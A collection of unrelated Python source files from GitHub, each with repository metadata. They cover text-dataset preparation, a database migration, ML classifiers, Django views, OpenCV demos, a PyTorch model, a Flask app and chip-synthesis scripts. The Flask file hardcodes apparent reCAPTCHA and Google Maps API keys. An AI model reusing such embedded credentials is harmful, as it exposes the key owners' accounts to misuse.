def __init__(self, input_path, output_path):
self.input_path = input_path
self.output_path = output_path
self.X = None
self.label = None
self.text = None
def read_file(self):
data = pd.read_csv(self.input_path, names=['text', 'label'])
self.text = data.text
if not data.label.isnull().all():
self.label = data.label
def convert_to_vector(self, emb_dict):
X = []
emb_len = len([*emb_dict.values()][0])
for sentence in self.text.values:
vector = np.zeros((1, emb_len))
words = [word for word in sentence.split() if word in emb_dict.keys()]
if len(words):
vector = np.mean([emb_dict[w] for w in words], axis=0)
X.append(vector)
self.X = np.vstack(X)
def augment_text(self, def_val=3):
eda = EDA()
avg = int(len(self.label) / self.label.nunique())
small_classes = (self.label.value_counts().reset_index(name='cnt')
.query(f'cnt < {avg}')['index'].values)
for cl in tqdm(small_classes):
tmp_df = self.text[self.label == cl]
for sentence in tmp_df.values:
text_aug = pd.Series([eda.synonym_replacement(sentence)
for _ in range(def_val)])
if sum(self.label==cl) > avg:
break
self.text = self.text.append(text_aug, ignore_index=True)
self.label = self.label.append(pd.Series([cl] * def_val),
ignore_index=True)
def shuffle_data(self):
new_index = np.random.randint(len(self.label), size=len(self.label))
self.label = self.label[new_index]
self.text = self.text[new_index]
def save_data(self):
np.save(os.path.join(self.output_path, 'X.npy'), self.X)
if self.label is not None:
np.save(os.path.join(self.output_path, 'Y.npy'),
self.label.to_numpy())
@staticmethod
def load_embedding(file_path):
embedding_dict = {}
with open(file_path, 'r') as f:
for line in tqdm(f):
values = line.split()
word = values[0]
vectors = np.asarray(values[1:], 'float32')
embedding_dict[word] = vectors
f.close()
return embedding_dict
|
marynadorosh/test_task
|
src/data/make_dataset.py
|
make_dataset.py
|
py
| 2,626 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "numpy.zeros",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "numpy.mean",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "numpy.vstack",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "textaugment.EDA",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "tqdm.auto.tqdm",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "pandas.Series",
"line_number": 54,
"usage_type": "call"
},
{
"api_name": "numpy.random.randint",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "numpy.random",
"line_number": 59,
"usage_type": "attribute"
},
{
"api_name": "numpy.save",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 65,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 65,
"usage_type": "attribute"
},
{
"api_name": "numpy.save",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 67,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 67,
"usage_type": "attribute"
},
{
"api_name": "tqdm.auto.tqdm",
"line_number": 75,
"usage_type": "call"
},
{
"api_name": "numpy.asarray",
"line_number": 78,
"usage_type": "call"
}
] |
41682530680
|
"""add directory id to address
Revision ID: 19e625982be8
Revises: a9adfd3c2eba
Create Date: 2018-02-02 23:11:03.395662
"""
from alembic import op
import sqlalchemy as sa
from sqlalchemy.dialects import postgresql
# revision identifiers, used by Alembic.
revision = '19e625982be8'
down_revision = 'a9adfd3c2eba'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('address', sa.Column('directory_id', sa.Integer(), nullable=True), schema='monday')
op.create_index(op.f('ix_monday_address_directory_id'), 'address', ['directory_id'], unique=False, schema='monday')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_index(op.f('ix_monday_address_directory_id'), table_name='address', schema='monday')
op.drop_column('address', 'directory_id', schema='monday')
# ### end Alembic commands ###
|
MondayHealth/provider-import
|
alembic/versions/19e625982be8_add_directory_id_to_address.py
|
19e625982be8_add_directory_id_to_address.py
|
py
| 973 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "alembic.op.add_column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "sqlalchemy.Column",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sqlalchemy.Integer",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "alembic.op.create_index",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "alembic.op.f",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "alembic.op.drop_index",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 28,
"usage_type": "name"
},
{
"api_name": "alembic.op.f",
"line_number": 28,
"usage_type": "call"
},
{
"api_name": "alembic.op.drop_column",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "alembic.op",
"line_number": 29,
"usage_type": "name"
}
] |
8099648005
|
import pandas as pd
import pydotplus
from IPython.display import Image
from sklearn import metrics
from sklearn.externals.six import StringIO
from sklearn.model_selection import train_test_split
from sklearn.tree import DecisionTreeClassifier, export_graphviz
# nazwy wszystkich kolumn z CSV
column_names = ['Elevation', 'Aspect', 'Slope', 'Horizontal_Distance_To_Hydrology', 'Vertical_Distance_To_Hydrology',
'Horizontal_Distance_To_Roadways', 'Hillshade_9am', 'Hillshade_Noon', 'Hillshade_3pm',
'Horizontal_Distance_To_Fire_Points', 'Wilderness_Area1', 'Wilderness_Area2', 'Wilderness_Area3',
'Wilderness_Area4', 'Soil_Type1', 'Soil_Type2', 'Soil_Type3', 'Soil_Type4', 'Soil_Type5', 'Soil_Type6',
'Soil_Type7', 'Soil_Type8', 'Soil_Type9', 'Soil_Type10', 'Soil_Type11', 'Soil_Type12', 'Soil_Type13',
'Soil_Type14', 'Soil_Type15', 'Soil_Type16', 'Soil_Type17', 'Soil_Type18', 'Soil_Type19', 'Soil_Type20',
'Soil_Type21', 'Soil_Type22', 'Soil_Type23', 'Soil_Type24', 'Soil_Type25', 'Soil_Type26', 'Soil_Type27',
'Soil_Type28', 'Soil_Type29', 'Soil_Type30', 'Soil_Type31', 'Soil_Type32', 'Soil_Type33', 'Soil_Type34',
'Soil_Type35', 'Soil_Type36', 'Soil_Type37', 'Soil_Type38', 'Soil_Type39', 'Soil_Type40', 'Cover_Type']
# wczytujemy dataset
dataset = pd.read_csv("covtype.csv", header=None, names=column_names)
# wydzielamy zmienne załeżne
feature_cols = column_names[:-1]
X = dataset[feature_cols]
y = dataset.Cover_Type
# dzielimy dataset na zbiory do uczenia się i testów
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.3, random_state=1)
# trenujemy model
clf = DecisionTreeClassifier()
clf = clf.fit(X_train, y_train)
y_pred = clf.predict(X_test)
print("Dokładność: {}".format(metrics.accuracy_score(y_test, y_pred)))
dot_data = StringIO()
# generacja i eksport grafiki drzewka
# głębokość ustawiamy na 5 bo przy wartości powyzęj generuje się godzinami
export_graphviz(clf, max_depth=5, out_file=dot_data, filled=True, rounded=True, special_characters=True,
feature_names=feature_cols)
print('Graphviz wygenerowany')
graph = pydotplus.graph_from_dot_data(dot_data.getvalue())
graph.write_png('trees.png')
Image(graph.create_png())
print('End of script.')
|
fedoruka/fct_classification
|
main.py
|
main.py
|
py
| 2,347 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "pandas.read_csv",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "sklearn.model_selection.train_test_split",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "sklearn.tree.DecisionTreeClassifier",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics.accuracy_score",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "sklearn.metrics",
"line_number": 35,
"usage_type": "name"
},
{
"api_name": "sklearn.externals.six.StringIO",
"line_number": 37,
"usage_type": "call"
},
{
"api_name": "sklearn.tree.export_graphviz",
"line_number": 41,
"usage_type": "call"
},
{
"api_name": "pydotplus.graph_from_dot_data",
"line_number": 44,
"usage_type": "call"
},
{
"api_name": "IPython.display.Image",
"line_number": 46,
"usage_type": "call"
}
] |
26625188476
|
from django.conf import settings
from django.core import urlresolvers
from django.http import HttpResponse, HttpResponseRedirect
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.utils.translation import ugettext_lazy as _
from product.modules.downloadable.models import DownloadLink
from satchmo_store.shop.signals import sendfile_url_for_file
import mimetypes
import os
import os.path
import re
from urlparse import urljoin
SHA1_RE = re.compile('^[a-f0-9]{40}$')
def _validate_key(download_key):
"""
Helper function to make sure the key is valid and all the other constraints on
the download are still valid.
Returns a tuple (False,"Error Message", None) or (True, None, dl_product)
"""
download_key = download_key.lower()
if not SHA1_RE.search(download_key):
error_message = _("The download key is invalid.")
return (False, error_message, None)
try:
dl_product = DownloadLink.objects.get(key=download_key)
except:
error_message = _("The download key is invalid.")
return (False, error_message, None)
valid, msg = dl_product.is_valid()
if not valid:
return (False, msg, None)
else:
return (True, None, dl_product)
def process(request, download_key):
"""
Validate that the key is good, then set a session variable.
Redirect to the download view.
We use this two step process so that we can easily display meaningful feedback
to the user.
"""
valid, msg, dl_product = _validate_key(download_key)
if not valid:
context = RequestContext(request, {'error_message': msg})
return render_to_response('shop/download.html',
context_instance=context)
else:
# The key is valid so let's set the session variable and redirect to the
# download view
request.session['download_key'] = download_key
url = urlresolvers.reverse('satchmo_download_send', kwargs= {'download_key': download_key})
context = RequestContext(request, {'download_product': dl_product,
'dl_url' : url})
return render_to_response('shop/download.html', context_instance=context)
def send_file(request, download_key):
"""
After the appropriate session variable has been set, we commence the download.
The key is maintained in the url but the session variable is used to control the
download in order to maintain security.
"""
if not request.session.get('download_key', False):
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': download_key})
return HttpResponseRedirect(url)
valid, msg, dl_product = _validate_key(request.session['download_key'])
if not valid:
url = urlresolvers.reverse('satchmo_download_process', kwargs = {'download_key': request.session['download_key']})
return HttpResponseRedirect(url)
# some temp vars
file = dl_product.downloadable_product.file
file_url = '/%s' % file.name # create an absolute/root url
# poll listeners
url_dict = {'url': file_url}
sendfile_url_for_file.send(
None, file=file,
product=dl_product.downloadable_product,
url_dict=url_dict,
)
# url may have changed; update it
file_url = url_dict['url']
# get file name from url
file_name = os.path.basename(file_url)
dl_product.num_attempts += 1
dl_product.save()
del request.session['download_key']
response = HttpResponse()
# For Nginx
response['X-Accel-Redirect'] = file_url
# For Apache and Lighttpd v1.5
response['X-Sendfile'] = file_url
# For Lighttpd v1.4
response['X-LIGHTTPD-send-file'] = file_url
response['Content-Disposition'] = "attachment; filename=%s" % file_name
response['Content-length'] = file.size
contenttype, encoding = mimetypes.guess_type(file_name)
if contenttype:
response['Content-type'] = contenttype
return response
|
dokterbob/satchmo
|
satchmo/apps/product/modules/downloadable/views.py
|
views.py
|
py
| 4,066 |
python
|
en
|
code
| 30 |
github-code
|
6
|
[
{
"api_name": "re.compile",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "product.modules.downloadable.models.DownloadLink.objects.get",
"line_number": 29,
"usage_type": "call"
},
{
"api_name": "product.modules.downloadable.models.DownloadLink.objects",
"line_number": 29,
"usage_type": "attribute"
},
{
"api_name": "product.modules.downloadable.models.DownloadLink",
"line_number": 29,
"usage_type": "name"
},
{
"api_name": "django.utils.translation.ugettext_lazy",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "django.template.RequestContext",
"line_number": 49,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render_to_response",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers.reverse",
"line_number": 56,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers",
"line_number": 56,
"usage_type": "name"
},
{
"api_name": "django.template.RequestContext",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "django.shortcuts.render_to_response",
"line_number": 59,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers.reverse",
"line_number": 68,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers",
"line_number": 68,
"usage_type": "name"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 69,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers.reverse",
"line_number": 72,
"usage_type": "call"
},
{
"api_name": "django.core.urlresolvers",
"line_number": 72,
"usage_type": "name"
},
{
"api_name": "django.http.HttpResponseRedirect",
"line_number": 73,
"usage_type": "call"
},
{
"api_name": "satchmo_store.shop.signals.sendfile_url_for_file.send",
"line_number": 81,
"usage_type": "call"
},
{
"api_name": "satchmo_store.shop.signals.sendfile_url_for_file",
"line_number": 81,
"usage_type": "name"
},
{
"api_name": "os.path.basename",
"line_number": 90,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 90,
"usage_type": "attribute"
},
{
"api_name": "django.http.HttpResponse",
"line_number": 95,
"usage_type": "call"
},
{
"api_name": "mimetypes.guess_type",
"line_number": 104,
"usage_type": "call"
}
] |
8101165169
|
import requests
import json
from config import keys
class ConvertionException(Exception):
pass
class CryptoConverter:
@staticmethod
def get_price(quote: str, base: str, amount: str):
if quote == base:
raise ConvertionException(f'Вы ввели одинаковые валюты {base}.')
try:
quote_ticker = keys[quote]
except KeyError:
raise ConvertionException(f'Не удалось обработать валюту {quote}')
try:
base_ticker = keys[base]
except KeyError:
raise ConvertionException(f'Не удалось обработать валюту {base}')
try:
amount = float(amount)
except ValueError:
raise ConvertionException(f'Не удалось обработать колличество {amount}.')
r = requests.get(f'https://min-api.cryptocompare.com/data/price?fsym={quote_ticker}&tsyms={base_ticker}')
total_base = json.loads(r.content)
new_price = total_base[keys[base]] * amount
new_price = round(new_price, 3)
message = f"Цена {amount} {keys[quote]} в {keys[base]} : {new_price}"
return message
|
voxvt/botexam
|
utils.py
|
utils.py
|
py
| 1,270 |
python
|
ru
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "config.keys",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "config.keys",
"line_number": 21,
"usage_type": "name"
},
{
"api_name": "requests.get",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "json.loads",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "config.keys",
"line_number": 32,
"usage_type": "name"
},
{
"api_name": "config.keys",
"line_number": 34,
"usage_type": "name"
}
] |
21712175054
|
# -*- coding: utf-8 -*-
from django.core.management.base import BaseCommand, CommandError
from optparse import make_option
from ...scraper import Scrap
class Command(BaseCommand):
option_list = BaseCommand.option_list + (make_option(
'--url',
action='store',
dest='url',
help='Subject of the email'),)
def handle(self, *args, **options):
#try:
Scrap(options.get('url'))
#except:
# raise CommandError('Broken does not exist')
|
jms/FlyNi-API
|
flyni_api/flyni/management/commands/get_data.py
|
get_data.py
|
py
| 500 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "django.core.management.base.BaseCommand.option_list",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "django.core.management.base.BaseCommand",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "optparse.make_option",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "scraper.Scrap",
"line_number": 18,
"usage_type": "call"
}
] |
37176092039
|
import numpy as np
import cv2
# Check available mouse events available with opencv library
# events = [i for i in dir(cv2) if 'EVENT' in i]
# print(events)
# General Callback function used for handling mouse events
def click_event(event, x, y, flags, param):
# Show x and y coordinate
if event == cv2.EVENT_LBUTTONDOWN:
print(x, ', ', y)
font = cv2.FONT_HERSHEY_SIMPLEX
strXY = str(x) + ', ' + str(y)
cv2.putText(img, strXY, (x, y), font, .5, (255, 255, 0), 2)
cv2.imshow('image', img)
# Show B, G and R channel
if event == cv2.EVENT_RBUTTONDOWN:
blue = img[y, x, 0]
green = img[y, x, 1]
red = img[y, x, 2]
font = cv2.FONT_HERSHEY_SIMPLEX
strBGR = str(blue) + ', ' + str(green) + ', ' + str(red)
cv2.putText(img, strBGR, (x, y), font, .5, (0, 255, 255), 2)
cv2.imshow('image', img)
# Create image from numpy
# img = np.zeros((512, 512, 3), np.uint8)
img = cv2.imread('data/images/messi.jpg')
img = cv2.resize(img, (512, 512))
# 'image' is windows title
cv2.imshow('image', img)
# setMouseCallback calls Function click_event
cv2.setMouseCallback('image', click_event)
cv2.waitKey(0)
cv2.destroyAllWindows()
|
sbhrwl/object_detection
|
src/opencv/mouse_events/handle_mouse_event.py
|
handle_mouse_event.py
|
py
| 1,226 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cv2.EVENT_LBUTTONDOWN",
"line_number": 12,
"usage_type": "attribute"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 14,
"usage_type": "attribute"
},
{
"api_name": "cv2.putText",
"line_number": 16,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "cv2.EVENT_RBUTTONDOWN",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 23,
"usage_type": "attribute"
},
{
"api_name": "cv2.putText",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "cv2.imread",
"line_number": 32,
"usage_type": "call"
},
{
"api_name": "cv2.resize",
"line_number": 33,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "cv2.setMouseCallback",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 41,
"usage_type": "call"
}
] |
70968292347
|
import cv2
import numpy as numpy
import os
detector = cv2.CascadeClassifier('haarcascade_frontalface_alt.xml')
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read("trainer/trainer.yml")
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
name = ['none', 'Godswill', 'Ebere', 'Godswill', 'handle']
cap = cv2.VideoCapture(0)
while True:
ret, frame = cap.read()
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
faces = detector.detectMultiScale(gray, 1.1, 2)
for (x,y,w,h) in faces:
cv2.rectangle(frame, (x,y), (x+w, y+h), (255, 0, 0), 3)
id, confidence = recognizer.predict(gray[y:y+h, x:x+y])
if (confidence <= 100):
id = name[id]
confidence = "{0}%".format(round(100-confidence))
else:
id = "Unknown"
confidence = "{}%".format(round(100-confidence))
cv2.putText(frame, str(id), (x+5, y-5), font, 1, (255, 0, 0), 2)
cv2.putText(frame, str(confidence), (x+5, y+h-5), font, 1, (255, 0, 0), 2)
cv2.imshow("Frame", frame)
k = cv2.waitKey(30) & 0xff
if k == "q":
break
cap.release()
cv2.destroyAllWindows()
|
awesomegusS/cv
|
recognizer.py
|
recognizer.py
|
py
| 1,158 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "cv2.CascadeClassifier",
"line_number": 5,
"usage_type": "call"
},
{
"api_name": "cv2.face.LBPHFaceRecognizer_create",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "cv2.face",
"line_number": 6,
"usage_type": "attribute"
},
{
"api_name": "cv2.FONT_HERSHEY_SIMPLEX",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "cv2.VideoCapture",
"line_number": 14,
"usage_type": "call"
},
{
"api_name": "cv2.cvtColor",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "cv2.COLOR_BGR2GRAY",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "cv2.rectangle",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "cv2.putText",
"line_number": 35,
"usage_type": "call"
},
{
"api_name": "cv2.putText",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "cv2.imshow",
"line_number": 38,
"usage_type": "call"
},
{
"api_name": "cv2.waitKey",
"line_number": 40,
"usage_type": "call"
},
{
"api_name": "cv2.destroyAllWindows",
"line_number": 45,
"usage_type": "call"
}
] |
74796405626
|
import torch
import torchvision
from torch import nn
from torch.nn import Sequential, Conv2d, MaxPool2d, Flatten, Linear
from torch.utils.data import DataLoader
from torch.utils.tensorboard import SummaryWriter
train_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=True, download=True,
transform=torchvision.transforms.ToTensor())
test_dataset = torchvision.datasets.CIFAR10(root="../dataset_CIFAR10", train=False, download=True,
transform=torchvision.transforms.ToTensor())
train_dataloader = DataLoader(dataset=train_dataset, batch_size=64, shuffle=True, drop_last=True)
class CIFAR10_Model(nn.Module):
def __init__(self):
super(CIFAR10_Model, self).__init__()
self.model = Sequential(Conv2d(3, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 32, 5, stride=1, padding=2),
MaxPool2d(2),
Conv2d(32, 64, 5, stride=1, padding=2),
MaxPool2d(2),
Flatten(),
Linear(1024, 64),
Linear(64, 10))
def forward(self, x):
output = self.model(x)
return output
model1 = CIFAR10_Model()
print(model1)
input = torch.ones(64, 3, 32, 32)
print(input.shape)
output = model1(input)
print(output.shape)
writer = SummaryWriter("../logs/model")
writer.add_graph(model1, input)
writer.close()
|
ccbit1997/pytorch_learning
|
src/cifar10_model.py
|
cifar10_model.py
|
py
| 1,591 |
python
|
en
|
code
| 0 |
github-code
|
6
|
[
{
"api_name": "torchvision.datasets.CIFAR10",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "torchvision.datasets",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "torchvision.datasets.CIFAR10",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "torchvision.datasets",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "torchvision.transforms.ToTensor",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "torchvision.transforms",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "torch.utils.data.DataLoader",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "torch.nn.Module",
"line_number": 15,
"usage_type": "attribute"
},
{
"api_name": "torch.nn",
"line_number": 15,
"usage_type": "name"
},
{
"api_name": "torch.nn.Sequential",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "torch.nn.MaxPool2d",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "torch.nn.MaxPool2d",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "torch.nn.Conv2d",
"line_number": 23,
"usage_type": "call"
},
{
"api_name": "torch.nn.MaxPool2d",
"line_number": 24,
"usage_type": "call"
},
{
"api_name": "torch.nn.Flatten",
"line_number": 25,
"usage_type": "call"
},
{
"api_name": "torch.nn.Linear",
"line_number": 26,
"usage_type": "call"
},
{
"api_name": "torch.nn.Linear",
"line_number": 27,
"usage_type": "call"
},
{
"api_name": "torch.ones",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "torch.utils.tensorboard.SummaryWriter",
"line_number": 41,
"usage_type": "call"
}
] |
72226014269
|
from flask import Flask
from flask_sqlalchemy import SQLAlchemy
import os
import datetime
from sqlalchemy.dialects.postgresql import ARRAY
app = Flask(__name__)
SECRET_KEY = os.urandom(32)
app.config['SECRET_KEY'] = SECRET_KEY
app.config["SQLALCHEMY_DATABASE_URI"] = "sqlite:///db.sqlite"
app.config['RECAPTCHA_USE_SSL'] = False
app.config['RECAPTCHA_PUBLIC_KEY'] = '6LfkN-EUAAAAAMEUxpQGg7DdGHqhz0eY0_2S5aKu'
app.config['RECAPTCHA_PRIVATE_KEY'] = '6LfkN-EUAAAAADXeLuqzoBOAg0F3f-b_oQEPiSzL'
app.config['RECAPTCHA_OPTIONS'] = {'theme': 'white'}
GOOGLEMAPS_KEY = "AIzaSyAsRuG0NnFmLNZlg6CWUTV8D2FA8gQo5xk"
app.config['GOOGLEMAPS_KEY'] = GOOGLEMAPS_KEY
db = SQLAlchemy(app)
class User(db.Model):
id = db.Column(db.Integer, primary_key=True)
city = db.Column(db.String(100))
state = db.Column(db.String(100))
age = db.Column(db.Integer)
symptoms = db.Column(db.String(), default=[])
ip_address = db.Column(db.String(255))
tested = db.Column(db.String(255))
in_contact = db.Column(db.String(255))
created_date = db.Column(db.DateTime, default=datetime.datetime.utcnow)
coordinates = db.Column(db.String(255))
def __init__(self, city, state, age, symptoms, ip_address, tested, in_contact, coordinates):
self.city = city
self.state = state
self.age = age
self.symptoms = symptoms
self.ip_address = ip_address
self.tested = tested
self.in_contact = in_contact
self.coordinates = coordinates
def __repr__(self):
return "<Location %r>" % (self.location)
# db.drop_all()
db.create_all()
|
dananguyenucsb/ithinkihavecovid-19
|
model.py
|
model.py
|
py
| 1,606 |
python
|
en
|
code
| 1 |
github-code
|
6
|
[
{
"api_name": "flask.Flask",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "os.urandom",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "flask_sqlalchemy.SQLAlchemy",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "datetime.datetime",
"line_number": 34,
"usage_type": "attribute"
}
] |
27513964476
|
# -*- coding: utf-8 -*-
import os
import sys
import io
import math
def synthesize_asic_entity(yosys_location, yosys_synth_script, target_cell, entity_name, timing_constraint, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
# Check if folder exists for the target cell, if not, create it
int_synthesis_output_folder = int_synthesis_output_folder + '/' + target_cell['name']
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_ASIC_CELL_LOCATION=' + target_cell['liberty_file'] + ' '
command = command + 'SYNTH_ASIC_PIN_CONSTRAINTS=' + target_cell['pin_constr_file'] + ' '
command = command + 'SYNTH_TIMING_CONSTRAINT=' + timing_constraint + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
# Open log and look for the delay and area results
result_filename = int_synthesis_output_folder + '/' + entity_name + '__t_' + timing_constraint + '.result'
# Area string to look for
area_result_line_1 = 'Chip area for module ' + "'" + "\\" + entity_name + "':"
area_result_line_2 = 'Chip area for top module ' + "'" + "\\" + entity_name + "':"
possible_area_result_lines = []
# Delay string to look for
delay_result_line = 'Delay ='
possible_delay_result_lines = []
with open(log_filename, "r") as log_file:
for log_line in log_file:
if (delay_result_line in log_line):
possible_delay_result_lines += [log_line]
if (area_result_line_1 in log_line):
possible_area_result_lines += [log_line]
if (area_result_line_2 in log_line):
possible_area_result_lines += [log_line]
# Only write the biggest area found for the top architecture
if(len(possible_area_result_lines) <= 1):
biggest_area_line = 0
else:
biggest_area_line = 0
temp_line_splitted = possible_area_result_lines[0].split(":")
biggest_area_line_result = float((temp_line_splitted[1]).strip())
for i in range(1, len(possible_area_result_lines)):
temp_line_splitted = possible_area_result_lines[i].split(":")
temp_area_line_result = float((temp_line_splitted[1]).strip())
if(temp_area_line_result > biggest_area_line_result):
biggest_area_line = i
biggest_area_line_result = temp_area_line_result
# Only write the first delay found. This needs to be redone, because ABC doesn't give proper delay results for non flattened results.
with open(result_filename, "w") as result_file:
result_file.write(possible_area_result_lines[biggest_area_line])
result_file.write(possible_delay_result_lines[0])
def synthesize_simple_entity(yosys_location, yosys_synth_script, entity_name, synthesis_output_folder):
# Check if folder exists, and if not create
if(not os.path.isdir(synthesis_output_folder)):
os.mkdir(synthesis_output_folder)
# Check if folder exists for the synthesis script, if not, create it
int_synthesis_output_folder = synthesis_output_folder + '/' + yosys_synth_script[:-4]
if(not os.path.isdir(int_synthesis_output_folder)):
os.mkdir(int_synthesis_output_folder)
command = 'SYNTH_TOP_UNIT_NAME=' + entity_name + ' '
command = command + 'SYNTH_OUTPUT_CIRCUIT_FOLDER=' + int_synthesis_output_folder + ' '
log_filename = int_synthesis_output_folder + '/' + entity_name + '.yslog'
command = command + yosys_location + ' -l ' + log_filename + ' -c ' + yosys_synth_script + ' -q'
print(command)
os.system(command)
def synthesize_asic_list(yosys_location, all_yosys_synth_scripts, all_target_cells, all_entity_names, all_timing_constraints, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_std_cell in all_target_cells:
for each_entity in all_entity_names:
for each_timing_constraint in all_timing_constraints:
synthesize_asic_entity(yosys_location, each_yosys_synth_ecript, each_std_cell, each_entity, each_timing_constraint, synthesis_output_folder)
def synthesize_simple_list(yosys_location, all_yosys_synth_scripts, all_entity_names, synthesis_output_folder):
for each_yosys_synth_ecript in all_yosys_synth_scripts:
for each_entity in all_entity_names:
synthesize_simple_entity(yosys_location, each_yosys_synth_ecript, each_entity, synthesis_output_folder)
